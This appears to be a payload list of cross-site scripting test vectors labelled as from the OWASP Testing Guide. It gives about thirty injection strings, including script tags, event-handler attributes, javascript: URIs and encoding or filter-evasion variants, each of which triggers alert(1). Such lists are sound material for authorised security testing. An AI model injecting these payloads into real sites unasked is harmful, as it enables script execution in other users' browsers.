# XSS Test Vectors — OWASP Testing Guide
# Format: one payload per line, lines starting with # are comments
# Use only against systems you are authorised to test.

<script>alert(1)</script>
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<input autofocus onfocus=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
javascript:alert(1)
<a href="javascript:alert(1)">click</a>
<div style="background:url(javascript:alert(1))">
<table background="javascript:alert(1)">
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<form action="javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<img src="jav&#x09;ascript:alert(1)">
<img src="jav&#x0A;ascript:alert(1)">
<img src="jav&#x0D;ascript:alert(1)">
<<script>alert(1)//<</script>
</script><script>alert(1)</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert(1)</script>
<script>eval('\x61lert\x281\x29')</script>
<script>window['alert'](1)</script>
<img src=# onmouseover=alert(1)>
<div onmouseover=alert(1)>hover</div>
